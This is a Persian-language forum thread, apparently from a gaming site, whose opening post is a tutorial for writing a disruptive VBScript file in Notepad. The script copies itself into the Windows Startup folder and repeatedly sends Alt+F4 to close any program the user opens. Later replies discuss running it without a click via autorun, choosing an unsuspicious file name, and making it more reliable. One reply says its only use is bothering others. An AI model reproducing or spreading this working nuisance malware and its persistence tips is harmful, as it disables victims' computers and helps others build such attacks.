امتیاز موضوع:
  • 1 رأی - میانگین امتیازات: 5
  • 1
  • 2
  • 3
  • 4
  • 5
ساخت کثیف ترین فایل مخرب توسط notepad
Exclamation 
به نام خدا
سلام به همه ی گیمران
قصد دارم آموزش ساخت فایل مخربی رو بگم که هر برنامه ای رو باز کنید بسته میشه
این نرم افزار میتونه خودشو توی استارت آپ کپی کنه که بعد از ری استارت شدن کامپیوتر هم شروع به کار کنه
برای ساخت این فایل notepad رو باز کنید(توی run بنویسید notepad)
و کد های زیر رو داخلش کپی کرده وبا پسوند .vbs ذخیره کنید(مثلا kheng.vbs)

do

Set a= WScript.CreateObject("WScript.Shell")
set b = CreateObject("Scripting.filesystemobject")

if b.fileexists("C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\kheng.vbs")=false then
b.copyfile wscript.scriptfullname,"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\kheng.vbs"
end if
wscript.sleep 1000
a.SendKeys "%{F4}"

loop

به هیچ عنوان رو فایل کلیک نکنید
میتونید اموزش کد های vbs رو اینجاببیند
اگه پست بالا رو خوندید متوجه ی این کد ها میشید (اگه نشدید بگین تا توضیح بدم)

نکته:برای کپی شدن فایل در استارت اپ باید ویندوز 7 باشه(میتونستیم از توی ریجستری فایل رو موقع باز شدن ویندوز اجرا کنیم که نیاز به دونستن ویندوز نداشت ولی چون اموزش ندادم از کد استفاده نکردم)

من خنگم
پاسخ
میگم راهی هست که بدون اینکه کلیک کنیم اجرا بشه؟
پاسخ
(02-11-2016, 09:45 PM)mojtaba 123 نوشته است: میگم راهی هست که بدون اینکه کلیک کنیم اجرا بشه؟

سلام عزیز راه که زیاده یکیش اینه که یه اتوران براش بسازی
چند تا راه دیگه هم هست که میخام تو یه پست جدا دربارش بحث کنم
 ممنونم به خاطر نظر
من خنگم
پاسخ
سلام
فک کنم یکم تو انتخاب عنوان زیاده روی کردی
یکم کد نویسی برنامه میتونست حرفه ای تر باشه
مثلا اگه تو مسیری که برای کپی کردن ویروس به برنامه دادی ، اگه از قبل تو اون مسیر یه فایل با همون نام باشه دیگه اون دستور اجرا نمیشه :|
بهتر بود یا یه اسم خیلی سخت و عجیب غریب میزاشتی ( که کسی هم شک نکنه ) یا اون کد رو یجور دیگه مینوشتی
در آخر هم که برای بستن برنامه ها از sendkey استفاده کردی که امکان خطای برنامه رو خیلی بالا میبره...
اینها رو اگه تغییر بدی بنظر من ویروست بهتر عمل میکنه
ـــــــــــــــــــــــــــــــــــــــــــــ
دوستانی هم که میخوان فایل های مخرب رو روی کامپیوترشون اجرا کنن ، بهتره از ماشین مجازی استفاده کنن...
[تصویر:  Moein_Awesome.png]
پاسخ
(02-12-2016, 08:15 PM)Moein Awesome نوشته است: سلام
فک کنم یکم تو انتخاب عنوان زیاده روی کردی
یکم کد نویسی برنامه میتونست حرفه ای تر باشه
مثلا اگه تو مسیری که برای کپی کردن ویروس به برنامه دادی ، اگه از قبل تو اون مسیر یه فایل با همون نام باشه دیگه اون دستور اجرا نمیشه :|
بهتر بود یا یه اسم خیلی سخت و عجیب غریب میزاشتی ( که کسی هم شک نکنه ) یا اون کد رو یجور دیگه مینوشتی
در آخر هم که برای بستن برنامه ها از sendkey استفاده کردی که امکان خطای برنامه رو خیلی بالا میبره...
اینها رو اگه تغییر بدی بنظر من ویروست بهتر عمل میکنه
ـــــــــــــــــــــــــــــــــــــــــــــ
دوستانی هم که میخوان فایل های مخرب رو روی کامپیوترشون اجرا کنن ، بهتره از ماشین مجازی استفاده کنن...
سلام عزیز ممنونم به خاطر نظر و انتقاد و پیشنهاد
بعید میدونم تو عنوان زیاده روی کرده باشم چون با اجرای این فایل هیچ راهی به جز تعویض دویندوز وجود نخواهد داشت
کدنویسی!!بله درست میفرمایید اگه پوشه ای به نام خنگ در استارت اپ باشه فایل کپی نمیشه(هیچ کس فایلی به اسم خنگ نمیسازه) وگفتین اسم سخت !!!مثلا این:dhoyfhooiffjpoyrewooogd.vbs انوقت کسی به این شک نمیکنه؟؟!!!
یا اگه مثلا اسمشو میزاشتمwindowsbstart یا همچین چیری احتمال اینکه فایل موجود باشه خیلی بیشتر از فایل خنگه 
درسته میتونستم کد رو یه جور دیگه بنویسم که اول فایل رو حدف کنه و دوباره کپی کنه
توی نکته گفتم که میتونم با ریجستری فایل رو باز کنم
من متوجه ی مشکل سندکی نمیشم مشکلش چیه که احتمال خطا رو بالا میبره؟؟؟
در ضمن توجه داشته باشید که من از زبان برنامه نیسی استفاده نکردم و فقط از یه اسکریپت نویسی ساده استفاده کردم
و شما انتظارتون از یه زبان اسکریپت نویسی خیلی زیاده هر چند که با همین زبان و با کمی خلاقیت میشه فایل های مخرب زیادی ساخت
و در اخر گفتین از ماشین مجازی استفاده بشه که درسته ولی کسایی که دسترسی ندارند میتونند اسلیپ فایل رو به 15 ثانیه افزایش بدن و بعد از اجرای فایل و مشاهده عملکردش از طریق تسک منیجر اون رو ببندند
در اخر بخاطر نظر سازنده و ظریف بینتون از شما قدر دانی و تشکر میکنم 
از شما متشکرم
پاسخ
برا كمك به دوست خنگمون اينو نوشتم: S0 (2) 
بازی آنلاین خفن نابود کردن کامپیوتر
whack your computer ،در این بازی آنلاین باحال راهکار جالبی برای فرو نشاندن خشم شما ارائه شده. شما به شدت مشغول کار با کامپیوتر هستین که عشقتون وارد اتاق میشه. قید کار و استرس رو بزنید و لپ تاپ خودتون رو درب و داغون کنید. در این بازی آنلاین ۱۲ روش برای نابودی کامپیوتر شما وجود داره که با توجه و دقت کافی می تونید این ۱۲ روش رو پیدا کنید. از همین الان در اتاق دنبال وسیله ای برای نابود کردن کامپیوتر بگردین و مشکل خودتون رو با کامپیوتر حل کنید. امیدواریم از انجام این بازی سرگرم کننده لذت ببرین.
حجم این بازی آنلاین خفن ۲٫۱ مگابایته و خواهشا تا بارگزاری کامل بازی شکیبا باشید …

http://www.abartazeha.ir/news/40952/%D8%...%AA%D8%B1/
اينو حتما ببينين. عاليه. البته اگه عخشي ندارين نبينين Eee
پاسخ
(02-14-2016, 01:56 PM)A Lone Gamer نوشته است: برا كمك به دوست خنگمون اينو نوشتم: S0 (2) 
whack your computer ،در این بازی آنلاین باحال راهکار جالبی برای فرو نشاندن خشم شما ارائه شده. شما به شدت مشغول کار با کامپیوتر هستین که عشقتون وارد اتاق میشه. قید کار و استرس رو بزنید و لپ تاپ خودتون رو درب و داغون کنید. در این بازی آنلاین ۱۲ روش برای نابودی کامپیوتر شما وجود داره که با توجه و دقت کافی می تونید این ۱۲ روش رو پیدا کنید. از همین الان در اتاق دنبال وسیله ای برای نابود کردن کامپیوتر بگردین و مشکل خودتون رو با کامپیوتر حل کنید. امیدواریم از انجام این بازی سرگرم کننده لذت ببرین.
حجم این بازی آنلاین خفن ۲٫۱ مگابایته و خواهشا تا بارگزاری کامل بازی شکیبا باشید …

سلام عزیز
دوست خنگ خخخخخخخخخخ S0 (45) S0 (45) S0 (45) S0 (45) ترکوندی با این جمله خدا خیرت بده خیلی خندیدم
این  ک یه بازیه فلشه
این پست اموزشی بود نه بازی ولی در هر صورت ممنونم 
بعد یه سوال "عخش" چیه؟؟؟؟

من خنگم
پاسخ
(02-15-2016, 10:33 PM)kheng نوشته است:
(02-14-2016, 01:56 PM)A Lone Gamer نوشته است: برا كمك به دوست خنگمون اينو نوشتم: S0 (2) 

سلام عزیز
دوست خنگ خخخخخخخخخخ S0 (45) S0 (45) S0 (45) S0 (45) ترکوندی با این جمله خدا خیرت بده خیلی خندیدم
این  ک یه بازیه فلشه
این پست اموزشی بود نه بازی ولی در هر صورت ممنونم 
بعد یه سوال "عخش" چیه؟؟؟؟

سلام رفتی بازی رو دیدی؟ خیلی باحاله.
چون موضوع اون بازی فلش نابود کردن کامپیوتره و تاپیک شمام ویروسه مخرب لابد اینجوریه خخخخخ
عخش نمیدونی چیه؟ همون عشق عه که دخترا وقتی خودشونو لوس میکنن اینجوری میگن. تو عخش منی S0 (2)
بنده خدا اخراجم شده S0 (2)
پاسخ
سلام دوست خنگ من
یه چند تا سوال دارم ک باس جواب بدی:
1-ما از کجا بفهمیم اینی که نوشتی درسته؟ یعنی چرته و پر ننوشتی؟
2-این فایل مخرب کجا کاربرد داره؟
3-چجوری با پسوند vbs ذخیرش کنیم؟
4- تو جواب مجتبی گفتی "اوتوران بسازیم" یعنی دقیقاچیکار باید بکنیم؟
5-تو جواب معین هم گفتی برای امتحان کردن اسلیپش رو به 15 افزایش بدیم خب این یعنی چی

یجوری حرف بزن بقیه هم بفمن نه اینکه فقط خودت بفمی اسلیپ چیه؟اتوران چیه؟vbs چیه؟ 113
پاسخ
(02-16-2016, 10:39 PM)HOoOH نوشته است: سلام دوست خنگ من
یه چند تا سوال دارم ک باس جواب بدی:
1-ما از کجا بفهمیم اینی که نوشتی درسته؟ یعنی چرته و پر ننوشتی؟
2-این فایل مخرب کجا کاربرد داره؟
3-چجوری با پسوند vbs ذخیرش کنیم؟
4- تو جواب مجتبی گفتی "اوتوران بسازیم" یعنی دقیقاچیکار باید بکنیم؟
5-تو جواب معین هم گفتی برای امتحان کردن اسلیپش رو به 15 افزایش بدیم خب این یعنی چی

یجوری حرف بزن بقیه هم بفمن نه اینکه فقط خودت بفمی اسلیپ چیه؟اتوران چیه؟vbs چیه؟ 113

سلام.

1- این کد کاملا درسته و مشکلی نداره.
2- کاربرد این فایل منفیه یعنی نمیشه تار درستی باهاش انجام داد و برای اذیت دیگران میشه استفاده کرد.
3- ابتدا باید پسوند فایل ها رو توی ویندوز نمایش بدید، بعد هنگام ذخیره فایل اخر اسم بنویسید vbs.
4- باید به زبان برنامه نویسی تسلط داشته باشید.
4K Wallpaper Games

TeamSpeak: 185.86.180.212:8888
پاسخ

موضوع‌های مشابه…
موضوع نویسنده پاسخ بازدید آخرین ارسال
  روش ساخت 4 ویروس فوق العاده خطرناک در Notepad!!!! Mr.ISO 23 23,150 07-04-2020, 07:11 PM
آخرین ارسال: MR.231123434
  تاپیک قرار دادن برنامه های ساخته شده توسط کاربران فروم who i am 0 1,453 01-18-2017, 11:31 AM
آخرین ارسال: who i am
  دادن منبع برای ساخت بازی who i am 0 1,412 01-17-2017, 12:11 PM
آخرین ارسال: who i am
  اختصاصی فروم گیمفا || چگونه یک فایل مخرب به زبان سی شارپ بنویسیم؟ (آموزش) Mr.ISO 4 2,382 05-30-2016, 08:29 PM
آخرین ارسال: Amir Hidden
  آموزش ساخت برنامه برای Restart و Shutdown و Logoff ویندوز Mr.ISO 1 1,928 04-16-2016, 09:06 PM
آخرین ارسال: Maziyar Hemmati

پرش به انجمن:

کاربرانِ درحال بازدید از این موضوع: 1 مهمان